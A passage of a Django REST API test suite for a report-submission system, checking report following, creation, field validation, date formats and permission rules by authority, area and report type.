        self.assertEqual(comment.created_by, self.taeyeon)
        flag = Flag.objects.latest('id')
        self.assertEqual(flag.comment, comment)
        self.assertEqual(flag.priority, PRIORITY_FOLLOW)
        self.assertEqual(flag.flag_owner, self.taeyeon)

    def test_api_post_report_follow_with_authority(self):
        """An authority member who did not create the report can still
        follow it; comment/flag are attributed to that member."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
        params = {
            'parent': self.report2.id
        }
        response = self.client.post(reverse('report-follow', args=[self.report1.id]), params)
        self.assertEqual(response.status_code, 200)
        report1 = Report.objects.get(id=self.report1.id)
        self.assertEqual(report1.parent, self.report2)
        # CHECK CREATE REPORT COMMENT FLAG
        comment = ReportComment.objects.latest('id')
        self.assertEqual(comment.report, report1)
        self.assertEqual(comment.created_by, self.yoona)
        flag = Flag.objects.latest('id')
        self.assertEqual(flag.comment, comment)
        self.assertEqual(flag.priority, PRIORITY_FOLLOW)
        self.assertEqual(flag.flag_owner, self.yoona)

    def test_api_post_report_follow_invalid(self):
        """Missing or unknown 'parent' yields HTTP 400 with a field error.

        NOTE(review): these assertions expect a bare string error value,
        while other tests in this file (e.g. report create) expect a list
        of strings — confirm which shape the serializer actually returns.
        """
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.post(reverse('report-follow', args=[self.report1.id]))
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['parent'], 'This field is required.')
        params = {
            'parent': 12345,
        }
        response = self.client.post(reverse('report-follow', args=[self.report1.id]), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['parent'], 'Report not found.')

    # Disabled test kept as a bare string expression (effectively a no-op).
    '''
    def test_api_post_report_follow_only_have_permission_on_report_type(self):
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.post(reverse('report-follow', args=[self.report4.id]))
        self.assertEqual(response.status_code, 403)
    '''

    def test_api_post_report_follow_only_have_permission_on_administration_area(self):
        """Following a report in a foreign administration area is forbidden."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.post(reverse('report-follow', args=[self.report5.id]))
        self.assertEqual(response.status_code, 403)

    def test_anonymous_cannot_access_api_post_report_follow(self):
        """Unauthenticated POST is rejected with HTTP 401."""
        response = self.client.post(reverse('report-follow', args=[self.report1.id]))
        self.assertEqual(response.status_code, 401)

    def test_cannot_get_api_post_report_follow(self):
        """GET is not an allowed method on report-follow (HTTP 405)."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('report-follow', args=[self.report1.id]))
        self.assertEqual(response.status_code, 405)
class TestApiReportCreate(APITestCase):
    """Tests for POST 'report-list' (report creation): happy paths for
    members and staff, parent linking via GUID, multiple date formats,
    permission errors on type/area, and field validation."""

    def setUp(self):
        # Ensure the special "positive" report type (id=0) exists.
        try:
            self.default_positive_type = ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            self.default_positive_type = ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        call_command('log_action_create', interactive=False, verbosity=0)
        call_command('clear_index', interactive=False, verbosity=0)
        # taeyeon and krystal are authority members; jessica is an outsider;
        # yoona is a superuser/staff account.
        self.taeyeon = factory.create_user(administration_area=factory.create_administration_area())
        self.jessica = factory.create_user()
        self.yoona = factory.create_user(is_superuser=True, is_staff=True)
        self.krystal = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.krystal)
        self.type = factory.create_report_type(authority=self.authority)
        self.area = factory.create_administration_area(authority=self.authority)
        self.area2 = factory.create_administration_area(authority=self.authority)
        self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type,
            administration_area=self.area, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
        self.report2 = factory.create_report(created_by=self.krystal, type=self.type,
            administration_area=self.area, date=datetime.datetime(2014, 11, 7, 12, 30, 45))

    def test_post_api_report_create(self):
        """Full payload creates a Report with all fields persisted."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
                "sickCount": 4,
                "deathCount": 3,
                "totalCount": 12,
                "nearByCount": 3
            },
            "negative": True,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        # Minimal fixed-offset tzinfo (UTC+07:00) for comparing stored dates.
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(minutes=420)
        report = Report.objects.latest('id')
        self.assertEqual(report.report_id, 123)
        self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
        self.assertEqual(report.type, self.type)
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
        self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
        self.assertEqual(report.administration_area, self.area)
        self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
        self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
        self.assertEqual(report.negative, True)
        self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
        self.assertEqual(json.loads(report.form_data), {
            "animalType": "dog",
            "symptom": "cough,fever,pain",
            "sickCount": 4,
            "deathCount": 3,
            "totalCount": 12,
            "nearByCount": 3
        })
        self.assertEqual(report.created_by, self.taeyeon)

    def test_post_api_report_create_with_report_type_code(self):
        """Use report type code instead of report type id"""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 10001,
            "guid": "guid-1001",
            "reportTypeCode": self.type.code,
            "date": timezone.now(),
            "incidentDate": timezone.now().strftime('%Y-%m-%d'),
            "administrationAreaId": self.area.id,
            "formData": {},
            "negative": True
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        created_report = Report.objects.latest('id')
        self.assertEqual(created_report.type.id, self.type.id)

    def test_post_api_report_create_with_authority(self):
        """Same happy path as above for a different authority member."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
                "sickCount": 4,
                "deathCount": 3,
                "totalCount": 12,
                "nearByCount": 3
            },
            "negative": True,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        # Minimal fixed-offset tzinfo (UTC+07:00).
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(minutes=420)
        report = Report.objects.latest('id')
        self.assertEqual(report.report_id, 123)
        self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
        self.assertEqual(report.type, self.type)
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
        self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
        self.assertEqual(report.administration_area, self.area)
        self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
        self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
        self.assertEqual(report.negative, True)
        self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
        self.assertEqual(json.loads(report.form_data), {
            "animalType": "dog",
            "symptom": "cough,fever,pain",
            "sickCount": 4,
            "deathCount": 3,
            "totalCount": 12,
            "nearByCount": 3
        })
        self.assertEqual(report.created_by, self.krystal)

    def test_post_api_follow_report_create_by_parent_guid(self):
        """Passing parentGuid links the new report to the parent report."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
                "sickCount": 4,
                "deathCount": 3,
                "totalCount": 12,
                "nearByCount": 3
            },
            "negative": True,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            },
            "parentGuid": self.report1.guid
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        # response_json = json.loads(response.content)
        # self.assertTrue(response_json['id'])
        # self.assertEqual(response_json['reportId'], 123)
        # self.assertEqual(response_json['guid'], '09d09djjjkdf09df0dfdfdfdf')
        # self.assertEqual(response_json['reportTypeId'], self.type.id)
        # self.assertEqual(response_json['date'], '2014-09-01T04:11:15+07:00')
        # self.assertEqual(response_json['incidentDate'], '2014-09-01')
        # self.assertEqual(response_json['administrationAreaId'], self.area.id)
        # self.assertEqual(response_json['remark'], 'xxxxxxxxxxxxxx')
        # self.assertEqual(response_json['negative'], True)
        # self.assertEqual(response_json['reportLocation']['type'], 'Point')
        # self.assertEqual(response_json['reportLocation']['coordinates'], [100.7522060000000010, 13.8082770000000004])
        # self.assertEqual(response_json['formData'], {
        #     "animalType": "dog",
        #     "symptom": "cough,fever,pain",
        #     "sickCount": 4,
        #     "deathCount": 3,
        #     "totalCount": 12,
        #     "nearByCount": 3
        # })
        # self.assertEqual(response_json['createdBy'], self.taeyeon.get_full_name())
        # Minimal fixed-offset tzinfo (UTC+07:00).
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(minutes=420)
        report = Report.objects.latest('id')
        self.assertEqual(report.report_id, 123)
        self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
        self.assertEqual(report.type, self.type)
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
        self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
        self.assertEqual(report.administration_area, self.area)
        self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
        self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
        self.assertEqual(report.negative, True)
        self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
        self.assertEqual(report.parent, self.report1)
        # self.assertEqual(report.priority, PRIORITY_FOLLOW)
        self.assertEqual(json.loads(report.form_data), {
            "animalType": "dog",
            "symptom": "cough,fever,pain",
            "sickCount": 4,
            "deathCount": 3,
            "totalCount": 12,
            "nearByCount": 3
        })
        self.assertEqual(report.created_by, self.taeyeon)

    def test_post_api_follow_report_create_by_parent_guid_with_authority(self):
        """parentGuid linking also works for another authority member."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
                "sickCount": 4,
                "deathCount": 3,
                "totalCount": 12,
                "nearByCount": 3
            },
            "negative": True,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            },
            "parentGuid": self.report2.guid
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        # Minimal fixed-offset tzinfo (UTC+07:00).
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(minutes=420)
        report = Report.objects.latest('id')
        self.assertEqual(report.report_id, 123)
        self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
        self.assertEqual(report.type, self.type)
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
        self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
        self.assertEqual(report.administration_area, self.area)
        self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
        self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
        self.assertEqual(report.negative, True)
        self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
        self.assertEqual(json.loads(report.form_data), {
            "animalType": "dog",
            "symptom": "cough,fever,pain",
            "sickCount": 4,
            "deathCount": 3,
            "totalCount": 12,
            "nearByCount": 3
        })
        self.assertEqual(report.parent, self.report2)
        # self.assertEqual(report.priority, PRIORITY_FOLLOW)
        self.assertEqual(report.created_by, self.krystal)

    def test_post_api_report_create_date_with_multiple_format(self):
        """The date field accepts both '+0700' and 'Z' offset notations."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        # FORMAT +0700
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+0700",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "formData": {
                "animalType": "dog",
            },
            "negative": False,
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        # response_json = json.loads(response.content)
        # self.assertEqual(response_json['date'], '2014-09-01T04:11:15+07:00')
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(minutes=420)
        report = Report.objects.latest('id')
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
        # FORMAT Z
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0zczczczc",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15Z",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "formData": {
                "animalType": "dog",
            },
            "negative": False,
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        # response_json = json.loads(response.content)
        # self.assertEqual(response_json['date'], '2014-09-01T04:11:15+00:00')
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(0)
        report = Report.objects.latest('id')
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))

    def test_post_api_report_create_date_with_multiple_format_with_authority(self):
        """Same date-format tolerance, exercised by another member."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        # FORMAT +0700
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+0700",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "formData": {
                "animalType": "dog",
            },
            "negative": False,
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(minutes=420)
        report = Report.objects.latest('id')
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
        # FORMAT Z
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0zczczczc",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15Z",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "formData": {
                "animalType": "dog",
            },
            "negative": False,
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        class TZ(datetime.tzinfo):
            def utcoffset(self, dt):
                return datetime.timedelta(0)
        report = Report.objects.latest('id')
        self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))

    # Disabled tests kept as a bare string expression (no-op). Note the
    # Python 2 `print response` inside — restore carefully if re-enabling.
    '''
    def test_post_api_report_create_positive_report_type_and_area_0(self):
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": 0,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            # "administrationAreaId": 0,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {},
            "negative": False,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)

    def test_post_api_report_create_positive_report_type_and_area_0_with_authority(self):
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": 0,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            # "administrationAreaId": 0,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {},
            "negative": False,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        print response
        self.assertEqual(response.status_code, 201)

    def test_post_api_report_create_positive_report_type_and_area_0_and_reporter_does_not_have_default_area_will_error(self):
        self.yoontae = factory.create_user()
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoontae.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": 0,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            # "administrationAreaId": 0,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {},
            "negative": False,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['administrationAreaId'], ['This user does not have default admintration area.'])
    '''

    def test_cannot_post_api_report_if_user_dont_have_authorized_in_report_type(self):
        """A non-member posting with a type outside their authority gets a
        field-level validation error (HTTP 400)."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
        params = {
            "reportTypeId": self.type.id,
            "reportId": 1234,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['reportTypeId'], ['You do not have permission to create this report type.'])

    def test_cannot_post_api_report_if_user_dont_have_authorized_in_administration_area(self):
        """A non-member posting into a foreign area gets a field error."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
        params = {
            "administrationAreaId": self.area.id,
            "reportId": 1234,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['administrationAreaId'], ['You do not have permission to create this area.'])

    def test_cannot_post_api_report_if_administration_area_group_is_not_role_reporter(self):
        """Membership via an ALERT (non-reporter) area group does not grant
        create permission on that area."""
        group_a = factory.add_user_to_new_group(user=self.taeyeon,
            type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
        area = factory.create_administration_area()
        factory.create_group_administration_area(group=group_a, administration_area=area)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
                "sickCount": 4,
                "deathCount": 3,
                "totalCount": 12,
                "nearByCount": 3
            },
            "negative": True,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['administrationAreaId'], ['You do not have permission to create this area.'])

    def test_cannot_post_api_report_if_report_type_group_is_not_role_reporter(self):
        """Membership via an ALERT (non-reporter) report-type group does not
        grant create permission on that type."""
        group_r = factory.add_user_to_new_group(user=self.taeyeon,
            type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
        newtype = factory.create_report_type()
        factory.create_group_report_type(group=group_r, report_type=newtype)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": newtype.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
                "sickCount": 4,
                "deathCount": 3,
                "totalCount": 12,
                "nearByCount": 3
            },
            "negative": True,
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['reportTypeId'], ['You do not have permission to create this report type.'])

    # Disabled tests kept as a bare string expression (no-op).
    '''
    def test_post_api_report_on_area_that_child_of_permitted_administration_area(self):
        area = self.area.add_child(name='Namsan', location=self.area.location)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
            },
            "negative": True
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
        # response_json = json.loads(response.content)
        # self.assertTrue(response_json['id'])

    def test_post_api_report_on_area_that_child_of_permitted_administration_area_with_authority(self):
        area = self.area.add_child(name='Namsan', location=self.area.location)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
            },
            "negative": True
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)
    '''

    def test_staff_can_post_api_report(self):
        """A staff/superuser account can create reports regardless of
        authority membership."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain"
            },
            "negative": True,
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 201)

    def test_report_guid_must_be_unique(self):
        """Reusing an existing report GUID is rejected with a field error."""
        report = factory.create_report()
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": report.guid,
            "reportTypeId": self.type.id,
            "date": "2014-09-01T04:11:15+07:00",
            "incidentDate": "2014-09-01",
            "administrationAreaId": self.area.id,
            "remark": "xxxxxxxxxxxxxx",
            "formData": {
                "animalType": "dog",
                "symptom": "cough,fever,pain",
                "sickCount": 4,
                "deathCount": 3,
                "totalCount": 12,
                "nearByCount": 3
            },
            "negative": True,
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['guid'], ['Report with this Guid already exists.'])

    def test_report_location_invalid(self):
        """reportLocation must use latitude/longitude keys within the
        valid geographic ranges; each violation yields HTTP 400."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportLocation": {
                "lat": 13.8082770000000004,
                "lng": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['reportLocation'], ['Invalid format.'])
        # INVALID LATITUDE
        # NOTE(review): this section label and the next are swapped — the
        # payload below has an out-of-range *longitude* (190.75...).
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportLocation": {
                "latitude": 13.8082770000000004,
                "longitude": 190.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['reportLocation'], [u'Longitude must be in between -180 to 180 degree.'])
        # INVALID LONGITUDE
        params = {
            "reportId": 123,
            "guid": "09d09djjjkdf09df0dfdfdfdf",
            "reportLocation": {
                "latitude": -91.8082770000000004,
                "longitude": 100.7522060000000010
            }
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['reportLocation'], ['Latitude must be in between -90 to 90 degree.'])

    def test_post_api_report_invalid(self):
        """Omitting required fields (reportId) yields HTTP 400."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            'negative': True
        }
        response = self.client.post(reverse('report-list'), params)
        self.assertEqual(response.status_code, 400)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['reportId'], ['This field is required.'])

    def test_anonymous_cannot_access_api_report_create(self):
        """Unauthenticated POST is rejected with HTTP 401."""
        response = self.client.post(reverse('report-list'))
        self.assertEqual(response.status_code, 401)
class TestApiReport(APITestCase):
    """Tests for GET 'report-detail': field serialization and the
    type/area permission checks that gate read access."""

    def setUp(self):
        # Ensure the special "positive" report type (id=0) exists.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        call_command('clear_index', interactive=False, verbosity=0)
        # taeyeon and krystal are authority members; jessica is an outsider;
        # yoona is a superuser/staff account.
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user(is_superuser=True, is_staff=True)
        self.krystal = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.krystal)
        self.type1 = factory.create_report_type(authority=self.authority)
        self.type2 = factory.create_report_type(authority=self.authority)
        self.area1 = factory.create_administration_area(authority=self.authority)
        self.area2 = factory.create_administration_area(authority=self.authority)
        self.report1 = factory.create_report(type=self.type1, administration_area=self.area1)
        self.report2 = factory.create_report(type=self.type2, administration_area=self.area2)

    def test_api_get_report(self):
        """The detail response serializes every field, including attached
        images and creator information."""
        image = factory.create_report_image(report=self.report1)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[self.report1.id]))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['id'], self.report1.id)
        self.assertEqual(response_json['reportId'], self.report1.report_id)
        self.assertEqual(response_json['guid'], self.report1.guid)
        self.assertEqual(response_json['reportTypeId'], self.report1.type.id)
        self.assertEqual(response_json['reportTypeName'], self.report1.type.name)
        self.assertEqual(response_json['date'], self.report1.date.isoformat() + '+00:00')
        self.assertEqual(response_json['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
        self.assertEqual(response_json['administrationAreaId'], self.report1.administration_area.id)
        # self.assertEqual(response_json['remark'], self.report1.remark)
        self.assertEqual(response_json['negative'], self.report1.negative)
        self.assertEqual(response_json['formData'], json.loads(self.report1.form_data))
        self.assertEqual(response_json['images'][0]['imageUrl'], image.image_url)
        self.assertEqual(response_json['images'][0]['thumbnailUrl'], image.thumbnail_url)
        self.assertEqual(response_json['images'][0]['note'], image.note)
        self.assertEqual(response_json['createdBy'], self.report1.created_by.get_full_name())
        self.assertEqual(response_json['createdByContact'], self.report1.created_by.contact)

    def test_api_get_report_with_authority(self):
        """The same serialization holds for another authority member."""
        image = factory.create_report_image(report=self.report1)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[self.report1.id]))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['id'], self.report1.id)
        self.assertEqual(response_json['reportId'], self.report1.report_id)
        self.assertEqual(response_json['guid'], self.report1.guid)
